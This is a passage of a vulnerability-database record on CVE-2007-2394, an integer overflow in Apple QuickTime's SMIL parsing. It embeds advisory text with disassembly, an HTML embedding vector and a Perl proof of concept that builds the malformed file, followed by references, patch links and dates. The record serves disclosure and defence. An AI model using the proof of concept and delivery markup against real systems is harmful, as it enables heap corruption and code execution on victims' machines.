(GNU/Linux)\n\niQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr\n4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV\n8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ\nzojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ\n+ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8\na7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ==\n=EV1X\n-----END PGP SIGNATURE-----\n. \n\nII. When parsing an SMIL file,\narithmetic calculations can cause insufficient memory to be allocated. \nWhen copying in user-supplied data from the SMIL file, a heap-based\nbuffer overflow occurs. This results in a potentially exploitable\ncondition. \n\nIII. This could\nbe accomplished using a malicious SMIL file referenced from a website\nunder the attacker\u0027s control. \n\nIV. Previous versions are\nsuspected to be vulnerable. \n\nV. WORKAROUND\n\niDefense is currently unaware of any effective workarounds for this\nvulnerability. \n\nVI. VENDOR RESPONSE\n\nApple has released QuickTime 7.2 which resolves this issue. More\ninformation is available via Apple\u0027s QuickTime Security Update page at\nthe URL shown below. \n\nhttp://docs.info.apple.com/article.html?artnum=305947\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2007-2394 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. CREDIT\n\nThis vulnerability was reported to iDefense by David Vaartjes from ITsec\nSecurity Services http://www.itsec-ss.nl/. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2007 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. \n\niDefense confirmed the existence of this vulnerability in version\n7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime\nbinaries for Windows XP and Vista are identical, this issue will\naffect QuickTime running on Windows Vista also. \n\n----------------------------------------------------------------------\nFIXED VERSIONS\n----------------------------------------------------------------------\n\nApple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS\nX v10.4.9 or later, Windows Vista and Windows XP SP2 to address this\nissue. See [2] for additional information about this update. \n\nQuickTime 7.2 is not available for the Windows 2000 platform. \nPresumably, Apple dropped support for this platform. \n\n----------------------------------------------------------------------\nPRODUCT DESCRIPTION\n----------------------------------------------------------------------\n\nQuickTime is Apple\u0027s media player product. According to Apple,\nQuickTime is downloaded over 10 million times a month. According to\nSecunia, QuickTime is currently installed on over 50% of PCs [3]. \n\nThe Synchronized MultiMedia Integration Language (SMIL) provides a\nhigh-level scripting syntax for describing multimedia presentations. \nSMIL files are text files that use XML-based syntax to specify what\nmedia elements to present and where and when to present them. This can be exploited to overflow that heap\nbuffer with user supplied content, which eventually can result in the\nexecution of arbitrary code. \n\n--\n\u003csmil\u003e\n\u003chead\u003e\n \u003cmeta name=\"title\" content=\"specific-length\"/\u003e\n \u003cmeta name=\"author\" content=\"specific-length\"/\u003e\n\u003c/head\u003e\n\u003c/smil\u003e\n--\n\nWhen such a SMIL file is parsed the length value of the author field\nis stored in a short int data type (16 bit) without bounds checking. \nIn sub_66952B50(), this value is (sign) extended to a long int data\ntype (32 bit). \n\n--\n66952C9A push eax\n66952C9B call sub_668B57D0\n66952CA0 --\u003e movsx eax, word ptr [esp+2Ch+var_C]\n66952CA5 mov edx, [esp+2Ch+arg_4]\n66952CA9 lea ecx, [esp+2Ch+var_10]\n--\n\nSo, when the length of the author field is \u003e= 0x8000 bytes, it will be\nextended to a length value between 0xffff8000 and 0xffffffff. \n\nNext, in sub_668DCFD0() the sign extended length of the author field\nis added to the length of the title field + 0x20:\n\n--\n668DD04D jnz short loc_668DD0A0\n668DD04F test ebx, ebx\n668DD051 jz loc_668DD1EB\n668DD057 --\u003e lea eax, [edi+ebx] // edi holds the length of\n // the title field + 0x20. \n // ebx holds the sign\n // extended length of the\n // author field. \n668DD05A push eax\n668DD05B push ecx\n--\n\nIn sub_668DCA60(), 4 is added to the result of the calculation:\n\n--\n668DCB37 test edi, edi\n668DCB39 jz short loc_668DCB40\n668DCB3B --\u003e lea eax, [edi+4] // edi holds the result\n668DCB3E jmp short loc_668DCB42\n--\n\nNext, in sub_668F5550() the final length value is used as the dwBytes\nargument in a call to HeapRealloc():\n\n--\n668F555E push eax // dwBytes (user specified)\n668F555F push ecx // lpMem\n668F5560 push 1 // dwFlags\n668F5562 push edx // hHeap\n668F5563 --\u003e call ds:HeapReAlloc\n--\n\nThis allows for the allocation of a controlled amount of memory. For\nexample, when setting the length of the author field to 0xff00 (65280)\nand the length of the title field to 0xdf (223), the following\nsituation occurs:\n\n1: sub_66952B50():\n\n0x0000ff00 will be sign extended to 0xffffff00. \n\n2: sub_668DCFD0():\n\n0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00\nresulting in a length value of 0xffffffff. \n\n3: sub_668DCA60():\n\n0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003. \n\n4: sub_668F5550():\n\nHeapRealloc() will allocate 0x00000003 bytes of memory. \n\nNext, the pointer returned by HeapRealloc() is used by sub_668DCFD0()\nas the dest argument in a call to memcpy():\n\n--\n668DD08E push ebx // count, length value right\n // after sign extension\n // (0xffffff00). \n668DD08F push edx // src, buffer with user\n // supplied (author) content. \n668DD090 add eax, esi\n668DD092 --\u003e push eax // dest, 3 byte buffer. \n668DD093 call _memcpy\n668DD098 add esp, 18h\n668DD09B jmp loc_668DD1E5\n--\n\nThis copy action will result in an overflow of the 3 byte heap\nbuffer with data from the author field (user supplied). Due to the\nlarge amount of data written, this will finally result in an access\nviolation when memory is read or written outside the heap page. The\nexception is handled by the program and execution continues with a\ncorrupt heap. \n\nFor my platform (win2k), when a call to HeapAlloc() is executed the\nunlink code of ntdll will \"fail\" because we have overwritten pointers\nin the heap management structures of other heap buffers with our data. \nThe status of the registers during unlinking is:\n\n--\nEAX 78787878 \u003c-- user supplied\nECX 78787878 \u003c-- user supplied\nEDX 012DF6F0 ASCII \"xxxxxxxxxxx \u003c-\u003e xxxxxxxxxxxx\"\nEBX 00000078\nESP 0012EDC8\nEBP 0012EF84\nESI 01200000\nEDI 012DF6F0 ASCII \"xxxxxxxxxxx \u003c-\u003e xxxxxxxxxxxx\"\n--\n\n--\n77f867e6 mov dword ptr ds:[ecx],eax\n77f867e8 mov dword ptr ds:[eax+4],ecx\n--\n\nThe unlink instructions will result in the following exception:\n\n---------------------------\nQuickTimePlayerMain: QuickTimePlayer.exe\n\n\"The instruction at \"0x77f867e6\" referenced memory at \"0x78787878\". \nThe memory could not be \"written\"\n---------------------------\n\nThis shows that we are able to overwrite 4 bytes anywhere in the\naddress space of the process with \"any\" 4 byte value we want, which\ncan for example be exploited to overwrite function pointers like the\nSEH or UEF to gain control of the process. This 4 byte overwrite via\nthe unlink code does not apply to XPSP2 and W2K3 as \"safe unlinking\"\nis used on these platforms. \n\n----------------------------------------------------------------------\nATTACK VECTORS\n----------------------------------------------------------------------\n\nThis vulnerability can be triggered by luring a target user into\nrunning a malicious SMIL file locally or via a webpage. In the later\nscenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used:\n\n\u003cOBJECT\n CLASSID=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\"\n CODEBASE=\"http://www.apple.com/qtactivex/qtplugin.cab\"\n WIDTH=\"10\" HEIGHT=\"10\" \u003e\n \u003c!-- malicious SMIL file --\u003e\n \u003cPARAM NAME=\"src\" VALUE=\"poc.smil\" /\u003e\n \u003cEMBED\n \u003c!-- available .qtif or .mov file to start up QT for FF --\u003e\n SRC=\"available-sample.qtif\"\n \u003c!-- malicious SMIL file --\u003e\n QTSRC=\"poc.smil\"\n WIDTH=\"10\" HEIGHT=\"10\"\n PLUGINSPAGE=\"www.apple.com/quicktime/download\"\n TYPE=\"video/quicktime\"\n /\u003e\n\u003c/OBJECT\u003e\n\n----------------------------------------------------------------------\nPROOF OF CONCEPT\n----------------------------------------------------------------------\n\n#!/usr/bin/perl -w\n\n####\n# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC\n#\n# Researched on QuickTime 7.1.3 on Windows 2000 SP4. \n#\n# David Vaartjes \u003cd.vaartjes at gmail.com\u003e\n####\n\n$file = \"poc.smil\";\n$padd = \"x\";\n$cop_len = 36;\n\n####\n# By choosing the following lengths the\n# integer overflow will be triggered. \n####\n\n$tit_len = 223;\n$auth_len = 65280;\n\nopen(FH,\"\u003e$file\") or die \"Can\u0027t open file:$!\";\n\nprint FH\n \"\u003csmil\u003e\\n\". \n \"\u003chead\u003e\\n\". \n \" \u003cmeta name=\\\"title\\\" content=\\\"\".$padd x $tit_len.\"\\\"/\u003e\\n\". \n \" \u003cmeta name=\\\"author\\\" content=\\\"\".$padd x $auth_len.\"\\\"/\u003e\\n\". \n \" \u003cmeta name=\\\"copyright\\\" content=\\\"\".$padd x $cop_len.\"\\\"/\u003e\\n\". \n \"\u003c/head\u003e\\n\". \n \"\u003c/smil\u003e\";\n\nclose(FH);\n\n----------------------------------------------------------------------\nREFERENCES\n----------------------------------------------------------------------\n\n[1] http://labs.idefense.com/intelligence/vulnerabilities/display.php?\nid=556\n[2] http://docs.info.apple.com/article.html?artnum=305947\n[3] http://secunia.com/blog/7/\n\n----------------------------------------------------------------------\nDISCLOSURE TIMELINE\n----------------------------------------------------------------------\n\n04/02/2007 Initial vendor notification (by iDefense)\n04/09/2007 Initial vendor response\n07/11/2007 Apple security bulletin \u0026 patches available\n07/11/2007 Public disclosure of iDefense advisory\n09/03/2007 Public disclosure of this advisory\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-2394"
},
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "BID",
"id": "24873"
},
{
"db": "VULHUB",
"id": "VHN-25756"
},
{
"db": "PACKETSTORM",
"id": "57697"
},
{
"db": "PACKETSTORM",
"id": "57713"
},
{
"db": "PACKETSTORM",
"id": "57674"
},
{
"db": "PACKETSTORM",
"id": "59056"
}
],
"trust": 3.06
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-25756",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-25756"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-2394",
"trust": 3.0
},
{
"db": "USCERT",
"id": "TA07-193A",
"trust": 2.9
},
{
"db": "BID",
"id": "24873",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "26034",
"trust": 2.7
},
{
"db": "SECTRACK",
"id": "1018373",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2007-2510",
"trust": 1.7
},
{
"db": "XF",
"id": "35357",
"trust": 1.4
},
{
"db": "CERT/CC",
"id": "VU#582681",
"trust": 1.2
},
{
"db": "OSVDB",
"id": "36134",
"trust": 1.1
},
{
"db": "USCERT",
"id": "SA07-193A",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274",
"trust": 0.7
},
{
"db": "IDEFENSE",
"id": "20070711 APPLE QUICKTIME SMIL FILE PROCESSING INTEGER OVERFLOW VULNERABILITY",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20070717 RE: IDEFENSE SECURITY ADVISORY 07.11.07: APPLE QUICKTIME SMIL FILE PROCESSING INTEGER OVERFLOW VULNERABILITY",
"trust": 0.6
},
{
"db": "APPLE",
"id": "APPLE-SA-2007-07-11",
"trust": 0.6
},
{
"db": "CERT/CC",
"id": "TA07-193A",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57674",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "59056",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "59040",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "30292",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "4359",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-83724",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-64870",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-25756",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57697",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57713",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "VULHUB",
"id": "VHN-25756"
},
{
"db": "BID",
"id": "24873"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "PACKETSTORM",
"id": "57697"
},
{
"db": "PACKETSTORM",
"id": "57713"
},
{
"db": "PACKETSTORM",
"id": "57674"
},
{
"db": "PACKETSTORM",
"id": "59056"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"id": "VAR-200707-0547",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-25756"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T20:23:17.334000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "QuickTime 7.2 for Mac",
"trust": 0.8,
"url": "http://www.apple.com/support/downloads/quicktime72formac.html"
},
{
"title": "QuickTime 7.2 for Windows",
"trust": 0.8,
"url": "http://www.apple.com/support/downloads/quicktime72forwindows.html"
},
{
"title": "About the security content of QuickTime 7.2",
"trust": 0.8,
"url": "http://docs.info.apple.com/article.html?artnum=305947-en"
},
{
"title": "About the security content of QuickTime 7.2",
"trust": 0.8,
"url": "http://docs.info.apple.com/article.html?artnum=305947-ja"
},
{
"title": "\u30a2\u30c3\u30d7\u30eb - QuickTime",
"trust": 0.8,
"url": "http://www.apple.com/jp/quicktime/download/win.html"
},
{
"title": "QuickTime 7.2 for Mac",
"trust": 0.8,
"url": "http://www.apple.com/jp/ftp-info/reference/quicktime72formac.html"
},
{
"title": "QuickTime 7.2 for Windows",
"trust": 0.8,
"url": "http://www.apple.com/jp/ftp-info/reference/quicktime72forwindows.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.us-cert.gov/cas/techalerts/ta07-193a.html"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/24873"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/26034"
},
{
"trust": 2.3,
"url": "http://docs.info.apple.com/article.html?artnum=305947"
},
{
"trust": 2.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556"
},
{
"trust": 1.7,
"url": "http://lists.apple.com/archives/security-announce/2007/jul/msg00001.html"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1018373"
},
{
"trust": 1.4,
"url": "http://www.frsirt.com/english/advisories/2007/2510"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/35357"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/473882/100/100/threaded"
},
{
"trust": 1.1,
"url": "http://osvdb.org/36134"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2007/2510"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35357"
},
{
"trust": 0.8,
"url": "about vulnerability notes"
},
{
"trust": 0.8,
"url": "contact us about this vulnerability"
},
{
"trust": 0.8,
"url": "provide a vendor statement"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2394"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta07-193a/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta07-193a/index.html"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2394"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/cas/alerts/sa07-193a.html"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/473882/100/100/threaded"
},
{
"trust": 0.4,
"url": "http://www.kb.cert.org/vuls/id/582681"
},
{
"trust": 0.3,
"url": "http://software.cisco.com/download/navigator.html?mdfid=283613663"
},
{
"trust": 0.3,
"url": "/archive/1/473882"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2394"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5090/"
},
{
"trust": 0.1,
"url": "http://secunia.com/network_software_inspector/"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/quicktime72formac.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/26034/"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/quicktime72forwindows.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://docs.info.apple.com/article.html?artnum=304263\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta07-193a.html\u003e"
},
{
"trust": 0.1,
"url": "http://docs.info.apple.com/article.html?artnum=305947\u003e"
},
{
"trust": 0.1,
"url": "http://www.apple.com/quicktime/download/standalone.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/quicktime72formac.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/quicktime72forwindows.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "http://docs.info.apple.com/article.html?artnum=106704\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/signup.html\u003e."
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/byid?searchview\u0026query=quicktime_72\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/reading_room/securing_browser/\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/),"
},
{
"trust": 0.1,
"url": "http://www.apple.com/quicktime/"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://www.itsec-ss.nl/."
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "https://www.apple.com/quicktime/download\""
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/7/"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?"
},
{
"trust": 0.1,
"url": "http://www.apple.com/qtactivex/qtplugin.cab\""
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "VULHUB",
"id": "VHN-25756"
},
{
"db": "BID",
"id": "24873"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "PACKETSTORM",
"id": "57697"
},
{
"db": "PACKETSTORM",
"id": "57713"
},
{
"db": "PACKETSTORM",
"id": "57674"
},
{
"db": "PACKETSTORM",
"id": "59056"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "VULHUB",
"id": "VHN-25756"
},
{
"db": "BID",
"id": "24873"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "PACKETSTORM",
"id": "57697"
},
{
"db": "PACKETSTORM",
"id": "57713"
},
{
"db": "PACKETSTORM",
"id": "57674"
},
{
"db": "PACKETSTORM",
"id": "59056"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-07-12T00:00:00",
"db": "CERT/CC",
"id": "VU#582681"
},
{
"date": "2007-07-15T00:00:00",
"db": "VULHUB",
"id": "VHN-25756"
},
{
"date": "2007-07-11T00:00:00",
"db": "BID",
"id": "24873"
},
{
"date": "2007-07-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"date": "2007-07-13T00:55:11",
"db": "PACKETSTORM",
"id": "57697"
},
{
"date": "2007-07-13T01:43:24",
"db": "PACKETSTORM",
"id": "57713"
},
{
"date": "2007-07-12T02:20:40",
"db": "PACKETSTORM",
"id": "57674"
},
{
"date": "2007-09-05T04:22:40",
"db": "PACKETSTORM",
"id": "59056"
},
{
"date": "2007-07-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"date": "2007-07-15T21:30:00",
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-07-13T00:00:00",
"db": "CERT/CC",
"id": "VU#582681"
},
{
"date": "2018-10-30T00:00:00",
"db": "VULHUB",
"id": "VHN-25756"
},
{
"date": "2007-09-05T18:21:00",
"db": "BID",
"id": "24873"
},
{
"date": "2007-07-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"date": "2007-07-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "57713"
},
{
"db": "PACKETSTORM",
"id": "57674"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apple QuickTime fails to properly handle malformed movie files",
"sources": [
{
"db": "CERT/CC",
"id": "VU#582681"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.